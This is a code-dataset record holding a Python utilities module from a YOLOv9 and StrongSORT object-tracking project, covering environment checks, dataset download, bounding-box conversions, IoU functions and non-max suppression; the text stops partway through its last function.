id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2,288,100 | general.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/general.py | # YOLOR general utils
import glob
import logging
import math
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import torchvision
import yaml
# Settings
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
pd.options.display.max_columns = 10
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads
def set_logging(rank=-1):
logging.basicConfig(
format="%(message)s",
level=logging.INFO if rank in [-1, 0] else logging.WARN)
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds
random.seed(seed)
np.random.seed(seed)
init_torch_seeds(seed)
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def check_online():
# Check internet connectivity
import socket
try:
socket.create_connection(("1.1.1.1", 443), 5) # check host accesability
return True
except OSError:
return False
def check_git_status():
# Recommend 'git pull' if code is out of date
print(colorstr('github: '), end='')
try:
assert Path('.git').exists(), 'skipping check (not a git repository)'
assert not isdocker(), 'skipping check (Docker image)'
assert check_online(), 'skipping check (offline)'
cmd = 'git fetch && git config --get remote.origin.url'
url = subprocess.check_output(cmd, shell=True).decode().strip().rstrip('.git') # github repo url
branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \
f"Use 'git pull' to update or 'git clone {url}' to download latest."
else:
s = f'up to date with {url} ✅'
print(emojis(s)) # emoji-safe
except Exception as e:
print(e)
def check_requirements(requirements='requirements.txt', exclude=()):
# Check installed dependencies meet requirements (pass *.txt file or list of packages)
import pkg_resources as pkg
prefix = colorstr('red', 'bold', 'requirements:')
if isinstance(requirements, (str, Path)): # requirements.txt file
file = Path(requirements)
if not file.exists():
print(f"{prefix} {file.resolve()} not found, check failed.")
return
requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(file.open()) if x.name not in exclude]
else: # list or tuple of packages
requirements = [x for x in requirements if x not in exclude]
n = 0 # number of packages updates
for r in requirements:
try:
pkg.require(r)
except Exception as e: # DistributionNotFound or VersionConflict if requirements not met
n += 1
print(f"{prefix} {e.req} not found and is required by YOLOR, attempting auto-update...")
print(subprocess.check_output(f"pip install '{e.req}'", shell=True).decode())
if n: # if packages updated
source = file.resolve() if 'file' in locals() else requirements
s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \
f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
print(emojis(s)) # emoji-safe
def check_img_size(img_size, s=32):
# Verify img_size is a multiple of stride s
new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
if new_size != img_size:
print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
return new_size
def check_imshow():
# Check if environment supports image displays
try:
assert not isdocker(), 'cv2.imshow() is disabled in Docker environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
print(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_file(file):
# Search for file if not found
if Path(file).is_file() or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True) # find file
assert len(files), f'File Not Found: {file}' # assert file was found
assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique
return files[0] # return file
def check_dataset(dict):
# Download dataset if not found locally
val, s = dict.get('val'), dict.get('download')
if val and len(val):
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()])
if s and len(s): # download script
print('Downloading %s ...' % s)
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
torch.hub.download_url_to_file(s, f)
r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip
else: # bash script
r = os.system(s)
print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value
else:
raise Exception('Dataset not found.')
def make_divisible(x, divisor):
# Returns x evenly divisible by divisor
return math.ceil(x / divisor) * divisor
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
x, y, = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
s = np.concatenate((s, s[0:1, :]), axis=0)
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, img_shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
iou = inter / union
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +
(b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / (h2 + eps)) - torch.atan(w1 / (h1 + eps)), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + eps # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
def bbox_alpha_iou(box1, box2, x1y1x2y2=False, GIoU=False, DIoU=False, CIoU=False, alpha=2, eps=1e-9):
# Returns tsqrt_he IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
# change iou into pow(iou+eps)
# iou = inter / union
iou = torch.pow(inter/union + eps, alpha)
# beta = 2 * alpha
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = (cw ** 2 + ch ** 2) ** alpha + eps # convex diagonal
rho_x = torch.abs(b2_x1 + b2_x2 - b1_x1 - b1_x2)
rho_y = torch.abs(b2_y1 + b2_y2 - b1_y1 - b1_y2)
rho2 = ((rho_x ** 2 + rho_y ** 2) / 4) ** alpha # center distance
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha_ciou = v / ((1 + eps) - inter / union + v)
# return iou - (rho2 / c2 + v * alpha_ciou) # CIoU
return iou - (rho2 / c2 + torch.pow(v * alpha_ciou + eps, alpha)) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
# c_area = cw * ch + eps # convex area
# return iou - (c_area - union) / c_area # GIoU
c_area = torch.max(cw * ch + eps, union) # convex area
return iou - torch.pow((c_area - union) / c_area + eps, alpha) # GIoU
else:
return iou # torch.log(iou+eps) or iou
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
def box_giou(box1, box2):
"""
Return generalized intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise generalized IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
areai = whi[:, :, 0] * whi[:, :, 1]
return iou - (areai - union) / areai
def box_ciou(box1, box2, eps: float = 1e-7):
"""
Return complete intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
eps (float, optional): small number to prevent division by zero. Default: 1e-7
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise complete IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps
# centers of boxes
x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2
y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2
x_g = (box2[:, 0] + box2[:, 2]) / 2
y_g = (box2[:, 1] + box2[:, 3]) / 2
# The distance between boxes' centers squared.
centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2
w_pred = box1[:, None, 2] - box1[:, None, 0]
h_pred = box1[:, None, 3] - box1[:, None, 1]
w_gt = box2[:, 2] - box2[:, 0]
h_gt = box2[:, 3] - box2[:, 1]
v = (4 / (torch.pi ** 2)) * torch.pow((torch.atan(w_gt / h_gt) - torch.atan(w_pred / h_pred)), 2)
with torch.no_grad():
alpha = v / (1 - iou + v + eps)
return iou - (centers_distance_squared / diagonal_distance_squared) - alpha * v
def box_diou(box1, box2, eps: float = 1e-7):
"""
Return distance intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
eps (float, optional): small number to prevent division by zero. Default: 1e-7
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise distance IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps
# centers of boxes
x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2
y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2
x_g = (box2[:, 0] + box2[:, 2]) / 2
y_g = (box2[:, 1] + box2[:, 3]) / 2
# The distance between boxes' centers squared.
centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2
# The distance IoU is the IoU penalized by a normalized
# distance between boxes' centers squared.
return iou - (centers_distance_squared / diagonal_distance_squared)
def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=()):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
if nc == 1:
x[:, 5:] = x[:, 4:5] # for models with one class, cls_loss is 0 and cls_conf is always 0.5,
# so there is no need to multiplicate.
else:
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
def non_max_suppression_kpt(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=(), kpt_label=False, nc=None, nkpt=None):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
if nc is None:
nc = prediction.shape[2] - 5 if not kpt_label else prediction.shape[2] - 56 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0,6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:5+nc] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
if not kpt_label:
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
else:
kpts = x[:, 6:]
conf, j = x[:, 5:6].max(1, keepdim=True)
x = torch.cat((box, conf, j.float(), kpts), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
